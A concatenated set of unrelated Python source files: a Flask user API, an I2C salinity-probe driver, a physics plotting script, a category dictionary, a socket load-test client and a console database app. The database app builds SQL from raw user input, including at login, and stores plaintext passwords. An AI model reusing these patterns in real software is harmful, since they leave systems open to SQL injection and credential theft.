User.query.filter(User.phone_number.like('%'+phone_number))\\\n .order_by(User.id.desc()).first()\n\n # TODO: add deleted_at validation\n\n if not user:\n return api_response(True, \"user not found\", 404)\n\n return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user', methods=['GET'])\ndef get_user_by_params():\n app.logger.debug('0')\n name = request.args.get('name', False, type=str)\n email = request.args.get('email', False, type=str)\n phone_number = request.args.get('phone_number', False, type=str)\n\n if not email and not phone_number and not name:\n return api_response(True, \"Params not supplied\", 400)\n\n name = '' if not name else name\n email = '' if not email else email\n phone_number = '' if not phone_number else phone_number.strip()\n\n user = False\n if phone_number:\n user = User.query.filter(User.phone_number.like('%'+phone_number))\\\n .order_by(User.id.desc()).first()\n\n if not user and email:\n user = User.query.filter(User.email == email).order_by(\n User.id.desc()).first()\n\n if not user and name:\n user = User.query.filter(User.name == name).order_by(\n User.name.desc()).first()\n\n # TODO: add deleted_at validation\n\n if not user:\n return api_response(True, \"invalid user\", 400)\n\n return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user_exists', methods=['HEAD'])\ndef user_exists():\n app.logger.debug('0')\n email = request.args.get('email', False, type=str)\n phone_number = request.args.get('phone_number', False, type=str)\n\n if not email and not phone_number:\n return api_response(True, \"Params not supplied\", 400)\n\n email = '' if not email else email\n phone_number = '' if not phone_number else phone_number.strip()\n\n user = False\n if phone_number:\n user = User.query.filter(User.phone_number.like('%'+phone_number))\\\n .order_by(User.id.desc()).first()\n if email:\n user = User.query.filter(User.email == email).order_by(\n User.id.desc()).first()\n\n # TODO: add deleted_at validation\n\n if not user:\n return api_response(True, \"User not found\", 404)\n\n return api_response(False, \"Success\", 200)\n\n\n@userapi.route('user//register_token', methods=['POST'])\ndef register_token(user_id):\n token = request.form.get('token', default=False, type=str)\n\n if not token:\n return api_response(True, \"Params not supplied\", 400)\n\n user = User.query.get(user_id)\n\n if not user:\n return api_response(True, \"invalid user\", 400)\n\n user.gcm_id = token\n user.updated_at = datetime.datetime.now()\n db.session.add(user)\n db.session.commit()\n\n return api_response(False, \"Token added successfully\", 200)\n\n\n@userapi.route('user', methods=['POST'])\ndef register_user():\n name = request.form.get('name', default=False, type=str)\n birth_date = request.form.get('birth_date', default=False, type=str)\n email = request.form.get('email', default=False, type=str)\n profile_picture = request.form.get('profile_picture', default=False,\n type=str)\n gender = request.form.get('gender', default=False, type=str)\n city = request.form.get('city', default=False, type=str)\n blood_type = request.form.get('blood_type', default=False, type=str)\n country_code = request.form.get('country_code', default=False, type=str)\n is_donor = request.form.get('is_donor', default=False, type=str)\n gcm_id = request.form.get('gcm_id', default=False, type=str)\n phone_number = request.form.get('phone_number', default=False, type=str)\n is_phone_validated = request.form.get(\"is_phone_validated\", False)\n latitude = request.form.get(\"latitude\", 0)\n longitude = request.form.get(\"longitude\", 0)\n\n # validating there's content\n if (not name or not birth_date or\n not email or not gender or\n not city or not blood_type or\n not country_code or not is_donor):\n return api_response(True, \"Params not supplied\", 400)\n\n if not valid_email(email):\n return api_response(True, \"Email not valid\", 400)\n\n bt_query = BloodType.query.filter(BloodType.name == blood_type).first()\n if not bt_query:\n return api_response(True, \"Wrong blood type\", 400)\n\n country_q = Country.query.filter_by(alpha2=country_code)\n country_code = country_q.first().code if country_q.count() > 0 else 214\n\n new_user = User(name, profile_picture if profile_picture else '', '',\n email, gender, '', '', city, is_donor, bt_query.id,\n country_code, is_phone_validated, latitude, longitude)\n\n if gcm_id:\n new_user.gcm_id = gcm_id\n\n if phone_number:\n new_user.phone_number = phone_number\n\n try:\n new_user.birth_date = db_date_parse(birth_date)\n except ValueError as ex:\n app.logger.error(ex)\n return api_response(True, \"Date format not valid\", 400)\n\n new_user.status_id = 1\n db.session.add(new_user)\n\n try:\n db.session.commit()\n except IntegrityError as ex:\n app.logger.error(ex)\n return api_response(True, \"An error occurred while \"\n \"processing your request: \"\n \"user exists or data invalid\", 400)\n\n return api_response(False, \"Created Successfully\", 201,\n new_user.to_serializable())\n\n\n@userapi.route('user//message', methods=['POST'])\n@login_required\ndef send_message(user_to_id):\n message = request.form.get('message', False)\n post_id = request.form.get('post_id', 0, type=int)\n\n if not message:\n return api_response(True, \"Parameters not supplied\", 400)\n\n if not 1 < len(message) < 160:\n return api_response(True, \"Length not valid\", 400)\n\n if user_to_id == current_user.id:\n return api_response(True, \"Can't send message to your own\", 400)\n\n if not User.query.get(user_to_id):\n return api_response(True, \"User does not exist\", 400)\n\n message = Message(message, current_user.id, user_to_id)\n\n post = Post.query.get(post_id)\n\n if post:\n message.post_id = post.id\n\n db.session.add(message)\n db.session.commit()\n\n notify_message(message)\n response = message.to_serializable()\n return api_response(False, \"Sent\", 200, response)\n\n\n@userapi.route('user//notifications', methods=['GET'])\n@login_required\ndef get_notifications(user_id):\n \"\"\"gets a paginated list of notifications\"\"\"\n\n if user_id != current_user.id:\n return api_response(True, \"Can't fetch other people's notifs\", 400)\n\n newer_notif_id = request.args.get('newer_notif_id', 0, type=int)\n older_notif_id = request.args.get('older_notif_id', 0, type=int)\n limit = app.config.get('PAGINATION_LIMIT')\n notifs_q = Notification.query.filter(Notification.user_id == user_id)\n\n if newer_notif_id > 0:\n notifs_q = notifs_q.filter(Notification.id > newer_notif_id)\n elif older_notif_id > 0:\n notifs_q = notifs_q.filter(Notification.id < older_notif_id)\n\n notifs_q = notifs_q.order_by(Notification.id.desc()).limit(limit).all()\n response = [u.to_serializable() for u in notifs_q]\n return api_response(False, \"Success\", 200, response)\n","sub_path":"web/donare/blueprints/api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":9329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"372054421","text":"import math\nimport struct\nimport time\nimport smbus\n\nglobal i2c\n\nEC_SALINITY = 0x3c # EC Salinity probe I2C address\n\nEC_MEASURE_EC = 80 # Command to start an EC measure\nEC_MEASURE_TEMP = 40 # Command to measure temperature\nEC_CALIBRATE_PROBE = 20 # Command to calibrate the probe\nEC_CALIBRATE_LOW = 10 # Command to calibrate the low point of the probe\nEC_CALIBRATE_HIGH = 8 # Command to calibrate the high point of the probe\nEC_I2C = 1 # Command to change the i2c address\nEC_DRY = 81 # Command to calibrate the probe for being dry\n\nEC_VERSION_REGISTER = 0 # version register\nEC_MS_REGISTER = 1 # mS register\nEC_TEMP_REGISTER = 5 # temperature in C register\nEC_K_REGISTER = 9 # cell constant register\nEC_SOLUTION_REGISTER = 13 # calibration solution register\nEC_TEMPCOEF_REGISTER = 17 # temperatue coefficient register\nEC_CALIBRATE_REFHIGH_REGISTER = 21 # reference low register\nEC_CALIBRATE_REFLOW_REGISTER = 25 # reference high register\nEC_CALIBRATE_READHIGH_REGISTER = 29 # reading low register\nEC_CALIBRATE_READLOW_REGISTER = 33 # reading high register\nEC_CALIBRATE_OFFSET_REGISTER = 37 # caliration offset\nEC_SALINITY_PSU = 41 # Salinity register\nEC_DRY_REGISTER = 45 # Dry calibration register\nEC_TEMP_COMPENSATION_REGISTER = 49 # temperature compensation register\nEC_CONFIG_REGISTER = 50 # config register\nEC_TASK_REGISTER = 51 # task register\n\nEC_EC_MEASUREMENT_TIME = 250 # delay between EC measurements\nEC_TEMP_MEASURE_TIME = 750 # delay for temperature measurement\n\nEC_DUALPOINT_CONFIG_BIT = 0 # dual point config bit\nEC_TEMP_COMPENSATION_CONFIG_BIT = 1 # temperature compensation config bit\n\nPSU_TO_PPT_CONVERSION = 1.004715 # conversion factor for PSU to PPT\n\n\nclass ecsalinity(object):\n S = 0\n mS = 0\n uS = 0\n PPM_500 = 0\n PPM_640 = 0\n PPM_700 = 0\n salinityPSU = 0\n salinityPPT = 0\n salinityPPM = 0\n tempC = 0\n tempF = 0\n tempCoefEC = 0.019\n tempCoefSalinity = 0.021\n address = EC_SALINITY\n\n def __init__(self, address, i2c_bus, **kwargs):\n global i2c\n self.address = address\n i2c = smbus.SMBus(i2c_bus)\n\n def measureTemp(self):\n self._send_command(EC_MEASURE_TEMP)\n time.sleep(EC_TEMP_MEASURE_TIME / 1000.0)\n self.tempC = self._read_register(EC_TEMP_REGISTER)\n self.tempF = ((self.tempC * 9) / 5) + 32\n return self.tempC\n\n def setTemp(self, temp_C):\n self._write_register(EC_TEMP_REGISTER, temp_C)\n self.tempF = ((self.tempC * 9) / 5) + 32\n \n def measureEC(self, tempCoefficient=None, newTemp=None):\n if tempCoefficient is None:\n tempCoefficient = self.tempCoefEC\n\n if newTemp is True:\n self.measureTemp()\n\n if self.usingTemperatureCompensation() is True:\n self.measureTemp()\n\n self._write_register(EC_TEMPCOEF_REGISTER, tempCoefficient)\n self._send_command(EC_MEASURE_EC)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n self.mS = self._read_register(EC_MS_REGISTER)\n\n if math.isinf(self.mS) is not True:\n self.PPM_500 = self.mS * 500\n self.PPM_640 = self.mS * 640\n self.PPM_700 = self.mS * 700\n self.uS = self.mS * 1000\n self.S = self.mS / 1000\n else:\n self.mS = -1\n self.PPM_500 = -1\n self.PPM_640 = -1\n self.PPM_700 = -1\n self.uS = -1\n self.S = -1\n\n self.salinityPSU = self._read_register(EC_SALINITY_PSU)\n self.salinityPPT = self.salinityPSU * PSU_TO_PPT_CONVERSION\n self.salinityPPM = self.salinityPPT * 1000\n return self.mS\n\n def measureSalinity(self):\n self.measureEC(self.tempCoefSalinity, self.usingTemperatureCompensation())\n return self.salinityPSU\n\n def calibrateProbe(self, solutionEC, tempCoef):\n dualpoint = self.usingDualPoint()\n\n self.useDualPoint(0)\n self._write_register(EC_TEMPCOEF_REGISTER, tempCoef)\n self._write_register(EC_SOLUTION_REGISTER, solutionEC)\n self._send_command(EC_CALIBRATE_PROBE)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n self.useDualPoint(dualpoint)\n\n def calibrateProbeLow(self, solutionEC, tempCoef):\n dualpoint = self.usingDualPoint()\n\n self.useDualPoint(0)\n self._write_register(EC_TEMPCOEF_REGISTER, tempCoef)\n self._write_register(EC_SOLUTION_REGISTER, solutionEC)\n self._send_command(EC_CALIBRATE_LOW)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n self.useDualPoint(dualpoint)\n\n def calibrateProbeHigh(self, solutionEC, tempCoef):\n dualpoint = self.usingDualPoint()\n\n self.useDualPoint(0)\n self._write_register(EC_TEMPCOEF_REGISTER, tempCoef)\n self._write_register(EC_SOLUTION_REGISTER, solutionEC)\n self._send_command(EC_CALIBRATE_HIGH)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n self.useDualPoint(dualpoint)\n\n def calibrateDry(self):\n self._send_command(EC_DRY)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n\n def setK(self, k):\n self._write_register(EC_K_REGISTER, k)\n\n def getK(self):\n return self._read_register(EC_K_REGISTER)\n\n def getVersion(self):\n return self._read_byte(EC_VERSION_REGISTER)\n\n def getCalibrateOffset(self):\n return self._read_register(EC_CALIBRATE_OFFSET_REGISTER)\n\n def getCalibrateHighReference(self):\n return self._read_register(EC_CALIBRATE_REFHIGH_REGISTER)\n\n def getCalibrateLowReference(self):\n return self._read_register(EC_CALIBRATE_REFLOW_REGISTER)\n\n def getCalibrateHighReading(self):\n return self._read_register(EC_CALIBRATE_READHIGH_REGISTER)\n\n def getCalibrateLowReading(self):\n return self._read_register(EC_CALIBRATE_READLOW_REGISTER)\n\n def getCalibrateDry(self):\n return self._read_register(EC_DRY_REGISTER)\n\n def reset(self):\n n = float('nan')\n self._write_register(EC_K_REGISTER, n)\n self._write_register(EC_CALIBRATE_OFFSET_REGISTER, n)\n self._write_register(EC_CALIBRATE_REFHIGH_REGISTER, n)\n self._write_register(EC_CALIBRATE_REFLOW_REGISTER, n)\n self._write_register(EC_CALIBRATE_READHIGH_REGISTER, n)\n self._write_register(EC_CALIBRATE_READLOW_REGISTER, n)\n self._write_register(EC_DRY_REGISTER, n)\n self.setTempConstant(0)\n self.useDualPoint(False)\n self.useTemperatureCompensation(False)\n\n def setCalibrateOffset(self, offset):\n self._write_register(EC_CALIBRATE_OFFSET_REGISTER, offset)\n\n def setDualPointCalibration(self, refLow, refHigh, readLow, readHigh):\n self._write_register(EC_CALIBRATE_REFLOW_REGISTER, refLow)\n self._write_register(EC_CALIBRATE_REFHIGH_REGISTER, refHigh)\n self._write_register(EC_CALIBRATE_READLOW_REGISTER, readLow)\n self._write_register(EC_CALIBRATE_READHIGH_REGISTER, readHigh)\n\n def setTempConstant(self, b):\n self._write_byte(EC_TEMP_COMPENSATION_REGISTER, b)\n\n def getTempConstant(self):\n return self._read_byte(EC_TEMP_COMPENSATION_REGISTER)\n\n def setI2CAddress(self, i2cAddress):\n self._write_register(EC_SOLUTION_REGISTER, int(i2cAddress))\n self._send_command(EC_I2C)\n self.address = int(i2cAddress)\n\n def useTemperatureCompensation(self, b):\n retval = self._read_byte(EC_CONFIG_REGISTER)\n\n retval = self._bit_set(retval, EC_TEMP_COMPENSATION_CONFIG_BIT, b)\n self._write_byte(EC_CONFIG_REGISTER, retval)\n\n def useDualPoint(self, b):\n retval = self._read_byte(EC_CONFIG_REGISTER)\n\n retval = self._bit_set(retval, EC_DUALPOINT_CONFIG_BIT, b)\n self._write_byte(EC_CONFIG_REGISTER, retval)\n\n def usingTemperatureCompensation(self):\n retval = self._read_byte(EC_CONFIG_REGISTER)\n return (retval >> 1) & 0x01\n\n def usingDualPoint(self):\n retval = self._read_byte(EC_CONFIG_REGISTER)\n return (retval >> 0) & 0x01\n\n def _bit_set(self, v, index, x):\n mask = 1 << index\n v &= ~mask\n if x:\n v |= mask\n return v\n\n def _change_register(self, r):\n global i2c\n i2c.write_byte(self.address, r)\n time.sleep(10 / 1000.0)\n\n def _send_command(self, command):\n global i2c\n i2c.write_byte_data(self.address, EC_TASK_REGISTER, command)\n time.sleep(10 / 1000.0)\n\n def _write_register(self, reg, f):\n global i2c\n n = self.round_total_digits(f)\n fd = bytearray(struct.pack(\"f\", n))\n data = [0, 0, 0, 0]\n data[0] = fd[0]\n data[1] = fd[1]\n data[2] = fd[2]\n data[3] = fd[3]\n self._change_register(reg)\n i2c.write_i2c_block_data(self.address, reg, data)\n time.sleep(10 / 1000.0)\n\n def _read_register(self, reg):\n global i2c\n data = [0, 0, 0, 0]\n self._change_register(reg)\n data[0] = i2c.read_byte(self.address)\n data[1] = i2c.read_byte(self.address)\n data[2] = i2c.read_byte(self.address)\n data[3] = i2c.read_byte(self.address)\n ba = bytearray(data)\n f = struct.unpack('f', ba)[0]\n return self.round_total_digits(f)\n\n def _write_byte(self, reg, val):\n global i2c\n i2c.write_byte_data(self.address, reg, val)\n time.sleep(10 / 1000.0)\n\n def _read_byte(self, reg):\n global i2c\n self._change_register(reg)\n time.sleep(10 / 1000.0)\n return i2c.read_byte(self.address)\n\n def magnitude(self, x):\n if math.isnan(x):\n return 0\n return 0 if x == 0 else int(math.floor(math.log10(abs(x)))) + 1\n\n def round_total_digits(self, x, digits=7):\n return round(x, digits - self.magnitude(x))\n","sub_path":"aerolib/lib/EC_Salinity-1.1.3/python/RaspberryPi/ecsalinity.py","file_name":"ecsalinity.py","file_ext":"py","file_size_in_byte":10077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"255172076","text":"import os,sys,string, time\nimport ROOT\nfrom math import *\nfrom ROOT import TTree, TObject, TFile, gDirectory, TH1D, TH2D, TH3D, TCanvas, gROOT, TGaxis, gStyle, TColor, TLegend, THStack, TChain, TLatex, TText\n#from ROOT import *\nfrom array import array\nfrom glob import glob\n\n# Importing rootlogon.C\nROOT.gROOT.SetMacroPath('~/');\nROOT.gROOT.Macro( os.path.expanduser( 'rootlogon.C' ) )\n\n# Opening root file\n#f = TFile(\"files/NuMIFlux.root\")\nf = TFile(\"../NuMIFlux.root\")\nf.ls()\n\nh_nue_parent_muonplus = f.Get(\"nue_parent_muonplus\")\nh_nue_tgptype_muonplus_kaonplus = f.Get(\"nue_tgptype_muonplus_kaonplus\")\nh_nue_tgptype_muonplus_kaonlong = f.Get(\"nue_tgptype_muonplus_kaonlong\")\n\nch_nue_tgptype_muonplus = TCanvas(\"c1\",\"c1\",1000,1000)\nch_nue_tgptype_muonplus.SetLogy()\n\nh_nue_parent_muonplus.SetLineColor(ROOT.kBlack)\n#h_nue_parent_muonplus.SetFillColor(ROOT.kOrange+10)\nh_nue_parent_muonplus.GetXaxis().SetRangeUser(0,8)\nh_nue_parent_muonplus.GetXaxis().SetTitle(\"Neutrino Energy [GeV]\")\nh_nue_parent_muonplus.GetYaxis().SetTitle(\"#Phi(#nu) / 50 MeV / cm^{2} / 6x10^{20} POT\")\n\nh_nue_tgptype_muonplus_kaonplus.SetLineColor(ROOT.kRed-9)\nh_nue_tgptype_muonplus_kaonplus.SetFillColor(ROOT.kRed-9)\n#h_nue_tgptype_muonplus_kaonplus.SetFillStyle(3144)\n\nh_nue_tgptype_muonplus_kaonlong.SetLineColor(ROOT.kRed-4)\nh_nue_tgptype_muonplus_kaonlong.SetFillColor(ROOT.kRed-4)\nh_nue_tgptype_muonplus_kaonlong.SetFillStyle(3144)\n\nh_nue_parent_muonplus.Draw();\nh_nue_tgptype_muonplus_kaonplus.Draw(\"same\");\nh_nue_tgptype_muonplus_kaonlong.Draw(\"same\");\n\nleg = TLegend(.5, .55, .7, .70)\nleg.SetFillStyle(0);\n#gStyle.SetLegendTextSize(2/30.);\nleg.AddEntry(h_nue_parent_muonplus, \"parent #mu^{+}\", \"l\");\nleg.AddEntry(h_nue_tgptype_muonplus_kaonplus, \"tgptype K^{+}\", \"f\");\nleg.AddEntry(h_nue_tgptype_muonplus_kaonlong, \"tgptype K^{0}_{L}\", \"f\");\nleg.Draw();\n\nt = TLatex(.4, .625, \"#nu_{e}\");\nt.SetTextColor(ROOT.kBlack);\nt.SetNDC();\nt.SetTextSize(2/30.);\nt.SetTextAlign(32);\nt.Draw();\n\n#t2 = TLatex(.51, .48, \"#splitline{Off-axis NuMI Flux}{at MicroBooNE}\");\n#t2.SetTextColor(ROOT.kRed+2);\n#t2.SetNDC();\n#t2.SetTextSize(1.4/30.);\n#t2.SetTextAlign(11);\n#t2.Draw();\n\n#t3 = TLatex(.51, .40, \"Anti-Neutrino Mode\");\n#t3.SetTextColor(ROOT.kBlack);\n#t3.SetNDC();\n#t3.SetTextSize(1.4/30.);\n#t3.SetTextAlign(11);\n#t3.Draw();\n\n\nraw_input(\"Please press enter to exit.\")\n","sub_path":"NuMIFluxMod/nu_parent_scripts/nue_tgptype_muonplus.py","file_name":"nue_tgptype_muonplus.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"107751177","text":"values = {\n 1: 'Мужчина',\n 2: 'Коты и животные',\n 3: 'Юмор',\n 4: 'Кулинария и handmade',\n 5: 'Мультфильмы',\n 6: 'Спорт',\n 7: 'Fashion',\n 8: 'Marvel/сериалы',\n 9: 'Кино',\n 10: 'Музыка',\n 11: 'Семья',\n 12: 'Татуировки',\n 13: 'Учёба',\n 14: 'Английский язык',\n 15: 'Аниме',\n 16: 'Бизнес',\n 17: 'Компьютерные игры',\n 18: 'Искусство',\n 19: 'Свадьба',\n 21: 'Наука',\n 22: 'Автомобили',\n 23: 'Математика и программирование',\n 24: 'Литература',\n 25: 'Праздничные мероприятия',\n 26: 'Йога и танцы',\n 27: 'Туризм',\n 28: 'Девушка',\n 29: 'Эзотеризм',\n 30: 'Театр',\n 31: 'Дизайн',\n 32: 'Велоспорт',\n 33: 'Активный отдых',\n}\n","sub_path":"app/values.py","file_name":"values.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18689690","text":"import time\nimport socket\nimport multiprocessing\n\nimport json\nimport struct\n\n\ndef sendJson(request, jsonData):\n data = json.dumps(jsonData).encode()\n request.send(struct.pack('i', len(data)))\n request.sendall(data)\n\n\ndef recvJson(request):\n data = request.recv(4)\n length = struct.unpack('i', data)[0]\n data = request.recv(length).decode()\n while len(data) != length:\n data = data + request.recv(length - len(data)).decode()\n data = json.loads(data)\n return data\n \n\nclass main(multiprocessing.Process):\n def __init__(self, i):\n super().__init__()\n self.i = i\n\n def run(self):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect(('127.0.0.1', 1234))\n sendJson(client, ['Hello'])\n data = recvJson(client)\n\n\na = time.time()\nprocesses = []\nfor i in range(1000):\n p = main(i)\n p.start()\n processes.append(p)\nfor p in processes:\n p.join()\nprint(time.time() - a)\n","sub_path":"tests/twisted/json_client.py","file_name":"json_client.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"537247746","text":"from datetime import datetime\nfrom datetime import timedelta\ndef show_menu():\n \"\"\"\n Prints in console the main menu\n :return: VOID\n \"\"\"\n print(\"User Menu \\n\"\n \"1. Create Account \\n\"\n \"2. Login \\n\"\n \"3. Search \\n\"\n \"4. Insert \\n\"\n \"5. Update \\n\"\n \"6. Delete \\n\"\n \"7. Exit \\n\")\ndef show_table_names(tables):\n \"\"\"\n Show all the tables names\n :param tables: a list with the tables names.\n You can get it by calling the method\n get_table_names() from DB object\n :return: VOID\n \"\"\"\n index = 1\n print(\"\\nTables:\")\n for table in tables:\n print(table[0]) # print tables names\n index += 1\ndef find_id_number(db_object,table,attribute):\n \"\"\"\n Finds the next available Unique ID number for any table\n \"\"\"\n\n #get a list of all ID's from the table\n query = \"\"\"SELECT {} FROM {}\"\"\".format(attribute,table)\n results = db_object.select(query=query)\n index=0\n #if known exists go with 0\n if results == ():\n return index\n \n match = False\n #Search each number until an unused ID is found\n while match == False:\n for result in results:\n match=False\n if index == result[0]:\n \n index=index+1\n break\n match=True\n\n \n #return ID index\n return index\n\n \n\ndef option1(db_object):\n try:\n #Collect User Account Information\n acctType=input(\"\\nWhat Type of Account is this: 1. Visistor or 2. Manager?(Type Number please)\")\n username=input(\"\\nChoose a username: \")\n password=input(\"\\nChoose a password: \")\n name=input(\"\\nWhat is your name? \")\n email=input(\"\\nWhat is your Email? \")\n\n #get Unique ids for a new account and a new user\n userid=str(find_id_number(db_object,\"User\",\"userid\"))\n acctId=str(find_id_number(db_object,\"Account\",\"acctId\"))\n \n #insert new user \n db_object.insert(table='User', attributes=('userid','Name','Email'),values=(userid,name,email))\n #insert new account with userId as foerign key\n db_object.insert(table='Account',attributes=('acctId','username','acctType','password','userId'),values=(acctId,username,acctType,password,userid))\n update_session(db_object,userid)\n #if failed run option1 again\n except Exception as err:\n print(err)\n option1(db_object)\n\n#Update Session with a thirty minute time window of use until asking for password again\ndef update_session(db_object, userid):\n #get unique session ID\n sessionId=str(find_id_number(db_object,\"session\",\"sessionId\"))\n #calculate the current time of session update\n now = datetime.now()\n\n #add 30 minutes\n expires = now + timedelta(minutes=30)\n exp= expires.strftime('%Y-%m-%d %H:%M:%S')\n\n user=userid[0]\n userId=str(user[0])\n\n \n\n#Add new session, before being able to use option after 30 minutes you must resign in\n try:\n db_object.insert(table='session', attributes=('sessionId','userSessionId','expires'), values=(sessionId,userId,exp))\n\n except Exception as err:\n print(err)\n\n\n\ndef option2(db_object):\n #get username and password\n username = input(\"\\nUsername: \")\n password = input(\"\\nPassword: \")\n query=\"\"\"SELECT * FROM Account WHERE username = '{}' and password = '{}'\"\"\".format(username,password)\n try:\n #search for username and password combo as username is Unique\n account= db_object.select(query=query)\n\n\n except Exception as err:\n print(err)\n \n\n if account == ():\n #restart if not found\n print(\"Password/Username combination does not exist\\n\")\n option2(db_object)\n # get the user ID from the account \n userIdquery=\"\"\"SELECT userId FROM Account WHERE username = '{}' and password = '{}'\"\"\".format(username,password)\n userid=db_object.select(query=userIdquery)\n\n #update session time of login\n update_session(db_object,userid)\n return \n\n#Search for a entity by specifying search parameters\ndef option3(db_object):\n now = datetime.now()\n expire = now.strftime('%Y-%m-%d %H:%M:%S')\n permissiveTables=[]\n try:\n #create query for current session\n query= \"\"\"SELECT userSessionId FROM session WHERE expires > '{}'\"\"\".format(expire)\n\n #query sessoions for current userId\n userId=db_object.select(query=query)\n \n #if query is empty no one is signed in\n if userId==():\n print(\"You're Not Logged In\")\n option2(db_object)\n option3(db_object)\n userId1=userId[0]\n userId2=str(userId1[0])\n\n #find acctType by querying account\n acctTypeQuery=\"\"\"SELECT acctType FROM Account WHERE userId = '{}'\"\"\".format(userId2)\n userAcctType= db_object.select(query=acctTypeQuery)\n acctId1=userAcctType[0]\n acctId2=str(acctId1[0])\n #get the tables that the user have access to Read\n featureQuery=\"\"\"SELECT feature FROM accountFeatures WHERE accountType = '{}'\"\"\".format(acctId2)\n featureId=db_object.select(query=featureQuery)\n \n tableList=[]\n tables=[]\n \n for feature in featureId:\n tableList.append(feature[0])\n \n for tabled in tableList:\n tables.append(db_object.select(query=\"\"\"SELECT tables FROM feature WHERE featureId = '{}' AND permission = 'Read'\"\"\".format(str(tabled))))\n \n for tabs in tables:\n for t in tabs:\n if t[0]!= ():\n permissiveTables.append(t[0])\n print(\"Tables with Search Permission\")\n count=0\n for search in permissiveTables:\n print(\"\"\"{}. {}\"\"\".format((count+1),search ))\n count=count+1\n except Exception as err:\n print(err)\n #display the names of the tales with permissions to choose from\n\n try:\n userSearch= int(input(\"Type the number of the table you would like to search in? \"))\n searchTable = permissiveTables[(userSearch-1)]\n #display fields for search criteria\n columns = db_object.get_column_names(searchTable)\n print(\"Fields in this Table: \")\n for column in columns:\n print(column[0])\n except Exception as err:\n print(\"Number must be in the range.\")\n option3(db_object)\n\n #get search criteria\n fieldSearch = input(\"Field: \")\n valueSearch= input(\"Value: \")\n try:\n searched = db_object.select(query=\"\"\"SELECT * FROM {} WHERE {} = '{}'\"\"\".format(permissiveTables[(userSearch-1)],fieldSearch,valueSearch))\n if searched ==():\n print(\"No results Found\")\n find=searched[0]\n counting=0\n for column in columns:\n print(\"\"\"{}: {}\"\"\".format(column[0],find[counting]))\n counting= counting+1\n return\n except Exception as err:\n print(\"No results Found\")\n \n return\n\n\n\ndef option4(db_object):\n now = datetime.now()\n expire = now.strftime('%Y-%m-%d %H:%M:%S')\n try:\n #create query for current session\n query= \"\"\"SELECT userSessionId FROM session WHERE expires > '{}'\"\"\".format(expire)\n\n #query sessoions for current userId\n userId=db_object.select(query=query)\n\n #if query is empty no one is signed in\n if userId==():\n print(\"You're Not Logged In\")\n option2(db_object)\n option4(db_object)\n #find acctType by querying account\n userId1=userId[0]\n userId2=str(userId1[0])\n acctTypeQuery=\"\"\"SELECT acctType FROM Account WHERE userId = '{}'\"\"\".format(userId2)\n userAcctType= db_object.select(query=acctTypeQuery)\n acctId1=userAcctType[0]\n acctId2=str(acctId1[0])\n \n featureQuery=\"\"\"SELECT feature FROM accountFeatures WHERE accountType = '{}'\"\"\".format(acctId2)\n featureId=db_object.select(query=featureQuery)\n\n tableList=[]\n tables=[]\n permissiveTables=[]\n #get the tables that the user have access to Write\n for feature in featureId:\n tableList.append(feature[0])\n \n for tabled in tableList:\n tables.append(db_object.select(query=\"\"\"SELECT tables FROM feature WHERE featureId = '{}' AND permission = 'Write'\"\"\".format(str(tabled))))\n \n for tabs in tables:\n for t in tabs:\n if t[0]!= ():\n permissiveTables.append(t[0])\n except Exception as err:\n print(err)\n #display the names of the tales with permissions to choose from\n print(\"Tables with Write Permission\")\n if permissiveTables == []:\n print(\"You Dont have that permission\")\n return\n count=0\n for search in permissiveTables:\n print(\"\"\"{}. {}\"\"\".format((count+1),search ))\n count=count+1\n #get the table being added to \n try:\n userSearch= int(input(\"Type the number of the table you would like to delete from? \"))\n searchTable = permissiveTables[(userSearch-1)]\n except Exception as err:\n print(\"Number must be in the range.\")\n option4(db_object)\n columns = db_object.get_column_names(searchTable)\n\n fieldList = []\n valueList = []\n #display fields for input values \n print(\"Fields in this Table: \")\n for column in columns:\n print(column[0])\n fieldList.append(column[0])\n valueList.append(input(\"Input value:\"))\n\n\n fieldTuple = tuple(fieldList)\n valueTuple = tuple(valueList)\n #insert values into table\n try:\n db_object.insert(table=searchTable,attributes=fieldTuple,values=valueTuple)\n except Exception as err:\n print(\"Add error occurred: Make sure all field values are correct\")\n #searched = db_object.select(query=\"\"\"SELECT * FROM {} WHERE {} = '{}'\"\"\".format(permissiveTables[(userSearch-1)],fieldSearch,valueSearch))\n #print(searched)\n\n#get a comma seperate string of table fields from user\ndef get_update_fields():\n attributes_str= input(\"Enter field names seperate by comma: \")\n valuesStr= input(\"Enter values in same order: \")\n\n if \",\" in attributes_str: # multiple attributes\n attributes = attributes_str.split(\",\")\n values = valuesStr.split(\",\")\n else: # one attribute\n attributes = attributes_str\n values = valuesStr\n setState=\"\"\"{} = '{}'\"\"\".format(attributes,values)\n return setState\n\n counter = 0;\n setState=[]\n try:\n for attribute in attributes:\n setState.append(\"\"\"{} = '{}'\"\"\".format(attribute,values[counter]))\n counter=counter+1;\n setStateStr=\", \".join(setState)\n \n return setStateStr\n except Exception as err:\n print(\"Input Fields incorrect\")\n\n #get a comma seperate string of conditions from user\n\ndef get_condition_fields():\n attributes_str= input(\"Enter field names seperate by comma: \")\n valuesStr= input(\"Enter values in same order: \")\n\n if \",\" in attributes_str: # multiple attributes\n attributes = attributes_str.split(\",\")\n values = valuesStr.split(\",\")\n else: # one attribute\n attributes = attributes_str\n values = valuesStr\n setState=\"\"\"{} ='{}'\"\"\".format(attributes,values)\n return setState\n\n \n counter = 0;\n setState=[]\n try:\n for attribute in attributes:\n setState.append(\"\"\"{} = 